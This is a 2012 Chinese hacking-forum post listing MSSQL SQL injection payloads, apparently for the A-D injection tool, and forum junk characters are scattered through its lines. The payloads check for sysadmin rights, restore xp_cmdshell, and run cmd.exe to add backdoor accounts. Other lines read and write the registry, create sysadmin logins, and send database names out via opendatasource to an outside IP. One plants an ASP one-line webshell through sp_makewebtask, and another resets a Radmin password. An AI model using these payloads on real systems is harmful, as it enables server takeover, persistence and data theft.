找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1956|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令4 H: P' j: \8 P+ G" \
//看看是什么权限的
/ P" P0 L6 x4 {( O) U1 k  Kand 1=(Select IS_MEMBER('db_owner'))+ x4 H+ u% G; g! ]( H
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--+ t( G, q; J) [1 z
  C9 ~$ s, t* ]1 O$ R
//检测是否有读取某数据库的权限. Q2 G' `0 X7 e, m0 b6 |
and 1= (Select HAS_DBACCESS('master')). k; E+ l. L( U: z. A; [' F; s& S
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --3 D( |- Y# D0 c
, R  V- n8 f' B$ w6 Q! i2 _4 H' X; L

* c8 J4 k  ~% \2 f& O$ E1 w4 l( ~; O1 z数字类型( B3 a$ Q) Q+ |9 g8 X; S
and char(124)%2Buser%2Bchar(124)=0! Q& D& K+ x4 p- a( |: V% P/ y+ o1 U

# b( d4 W5 c) [4 y: ^# A( ^字符类型/ c* p' p! ]& G1 a4 z9 K5 t/ b; N
' and char(124)%2Buser%2Bchar(124)=0 and ''=', r! n/ t5 u' P) F  Q. W
9 n  P8 _# B* R( ~
搜索类型
2 X" w8 m* X* Q' and char(124)%2Buser%2Bchar(124)=0 and '%'='1 \& a+ ]# j8 Y/ j' ]' g
  z+ ]" B9 }, I. i+ D8 x1 M2 W2 ~
爆用户名" m5 P3 Q4 G: L6 U& K  I3 o
and user>02 Z1 n" R$ V1 L% m* `0 M5 K
' and user>0 and ''='
) b+ J* B1 g  C- Q2 U0 o/ \% o* E6 @$ g
检测是否为SA权限. ?! y2 J7 p# d" D. I  _5 J$ Y1 G6 ?7 @
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--) C. P  f3 V( T. @+ q# J' W
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
) x* X) k" I8 _( b( P4 c" Z  A2 H$ i/ G, |3 a( x5 C
检测是不是MSSQL数据库
& A% j* h2 W, j9 |and exists (select * from sysobjects);--
+ [% z' ]6 U% _) Z) r3 u7 Y7 x; G- G4 U) D' d
检测是否支持多行& P' N' J6 @$ \; n$ d" Z
;declare @d int;--
" t& z" e  S  j0 t0 P  y* k4 J" Q$ _
恢复 xp_cmdshell
3 [6 \& G; A& V/ B# b5 F8 [;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--* e- t$ W+ T/ Y+ f3 g
% d7 x9 I- R1 d/ ]4 [

0 a% y: s2 K: {5 I1 F/ D" `select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
' e( i1 u- h# x9 V( K) f) o! B0 t/ x7 H5 n2 |/ R9 Z
//-----------------------
- z' s, A& b% s1 {( L8 l//      执行命令  n8 @6 p8 a  T7 w
//-----------------------% Z! E4 ]8 @7 c/ V. g
首先开启沙盘模式:* s# ?' u% g4 z0 ]: z' L
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 D# b4 H1 {9 r8 A% H+ Y' p4 Y1 Q+ p; r. h
然后利用jet.oledb执行系统命令1 ^1 _3 B& F! ^3 ]
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
  e! y5 Z. J. y7 D: l; b2 ]" c8 V/ W) ~8 @$ @" r, i
执行命令8 z, ?- j4 z, P  J6 M$ A; z6 g0 i9 V6 A
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
0 s# N0 ?" x8 s: ~
/ i) a5 g9 S$ Z: F, Y" _  K, gEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'4 V9 W3 |+ P' _) B" j
) x! |9 T( I* y3 z
判断xp_cmdshell扩展存储过程是否存在:! C+ {  r" I% p3 R& n4 P( Y% G
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')' `1 ]# K# Y8 s! E4 X

" f7 Z3 D% W, _: c8 g4 n1 H写注册表* n# N$ f7 o( P: _$ x
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* x2 u7 n; j# w$ @' ~7 a! J, ]6 F/ G5 F, J6 n
REG_SZ
1 p1 h- Z+ V+ h4 g6 B1 w: O4 ]' c) v0 i% X; W; d* S
读注册表
. o! _; e- X- z. H0 Eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'1 I: `- V" y6 z

) U' c, E) o- b+ `, g4 R$ i读取目录内容$ s  k$ \+ C4 R7 K6 `% \
exec master..xp_dirtree 'c:\winnt\system32\',1,10 b- l4 o" w2 d) z. `& c2 R
/ m7 Z2 Y0 X+ n6 P' B

0 {- |/ O( w' Q4 d! A数据库备份/ D& W% p3 z9 y7 T/ O, l8 B
backup database pubs to disk = 'c:\123.bak'3 u  b. f: w& z+ i6 v( |5 O; e

4 q4 }2 c7 i3 o3 @4 G//爆出长度
9 M# j2 \% D: v) z/ S5 V" pAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
! m3 ?- ?% [1 p* L& Z
6 f2 q/ I" \5 C  k6 u
) r- f, u4 }2 L0 q8 @" J( X6 E& ^; i# E8 _: W
更改sa口令方法:用sql综合利用工具连接后,执行命令:
; g( Y1 x& j5 i' Oexec sp_password NULL,'新密码','sa': c8 \8 K" H# |9 r: u# @) o
, L( n- e3 e$ n" C! |, l
添加和删除一个SA权限的用户test:
& F: m" Z1 \4 E2 u) t7 _exec master.dbo.sp_addlogin test,ptlove( C. j" ~  G# s; u; S2 f- c
exec master.dbo.sp_addsrvrolemember test,sysadmin
' W, L) A$ Y5 U4 [3 P) l
9 C) ?3 H- C# l  q删除扩展存储过过程xp_cmdshell的语句:
, n; R( K! o$ v( a. [exec sp_dropextendedproc 'xp_cmdshell'5 `- V5 o3 a& H" |8 \6 `1 O

$ [( u6 f6 W) P) m! u. t添加扩展存储过过程0 j2 H& q" U4 O
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' & p) t4 h& A: |2 S! d" v
GRANT exec On xp_proxiedadata TO public
# o) [% [* \, a9 I  L( H
* @% ^5 ?; C  I; m5 [; [6 c7 _& `8 i+ Y8 V2 w1 R
停掉或激活某个服务。
/ V4 a' Q' K1 r+ n, {0 P) ]# ]0 ^% P$ f9 X
exec master..xp_servicecontrol 'stop','schedule'
) o4 g- k0 p" f5 z$ S3 Yexec master..xp_servicecontrol 'start','schedule'
( T2 r2 n# w! E/ n+ U; u' V+ y- M' @. b* ]6 x
dbo.xp_subdirs
# J" M, a; E, G* z) H) n+ C# I) P# K3 m+ t2 ~: q
只列某个目录下的子目录。
% p) r4 y0 X0 p- C' s# uxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
$ I3 V- W+ E2 R8 F, A* Z3 M
; W; b5 a8 K* f; `dbo.xp_makecab
9 s% J1 t' e0 E* Y- X! b( K
0 W# ?8 s- V8 w+ g! w  @2 j1 F将目标多个档案压缩到某个目标档案之内。
$ n8 P2 X$ ~/ y所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
) G# ?  N' ^5 F/ ~) _0 l3 w, Y6 _, U$ m, h, B
dbo.xp_makecab1 W3 N4 m& c7 q9 p% J
'c:\test.cab','mszip',1,7 g+ i1 H- E5 N
'C:\Inetpub\wwwroot\SQLInject\login.asp',
- B4 ?6 ^" K) {0 B! V'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 R. N! J0 k- I" w
2 m! j6 p8 K& \% O9 C5 P* B0 E% g) ~xp_terminate_process# c; O4 ~  D5 p" A& _6 ?. E
, z( R. O- `7 n( X
停掉某个执行中的程序,但赋予的参数是 Process ID。& @: U, D) f9 y6 x( A0 X, S
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# [9 M2 L! `0 X( f, _

9 ?5 C7 n; |1 {* H6 Q0 Nxp_terminate_process 2484$ X9 |& h" ?; Q+ T- x6 k1 \) W2 D

9 s( G. j7 w# x0 v2 @xp_unpackcab. w# w" _) D9 W' s
% k" Q) }0 F" S) ^
解开压缩档。
; q; z( K' O* {8 x+ T
' A5 T2 _. q: Axp_unpackcab 'c:\test.cab','c:\temp',1
- v* |# M! G4 P- e- y
, t$ C7 m: r* C: W+ @  F% B+ K
' T5 m0 Y+ G' N$ Z; P3 _' _" z某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- p% l% d- A, \3 s4 H: q
2 U* u. j/ d' m- V$ a6 rcreate database lcx;6 P' W4 I; g4 f: S' s
Create TABLE ku(name nvarchar(256) null);8 F. M7 q. x6 n# C$ {' l
Create TABLE biao(id int NULL,name nvarchar(256) null);
; C- |# [# R) ]* [
7 |- C( T. U3 w% D$ [5 u/ j8 m//得到数据库名/ o( n2 |  D( U  U1 R1 w
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 }! L' P& q9 ?2 [: o( u# \  W2 M5 J: F* r
- x: K1 e1 N# X8 ]& l- P( I) G5 M
//在Master中创建表,看看权限怎样: ]: _% Y. W8 U7 O9 z0 G  a6 ?; T
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
8 M7 O+ `/ Y6 W& Y$ k- y1 i6 P5 D4 K1 T2 J8 P8 e
用 sp_makewebtask直接在web目录里写入一句话马:7 M5 b- g; p, s9 ]2 |: Q
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--  j: R2 D/ C3 `" x" I. c9 ^

5 y' J/ m1 l) A) B4 t" I//更新表内容
: q. h3 [& G% m1 p/ _Update films SET kind = 'Dramatic' Where id = 123
! `& }3 r7 U( y5 |" O. b
) ~0 A& k2 }" Q! h//删除内容! i: J1 o& }( D, i& N) j
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表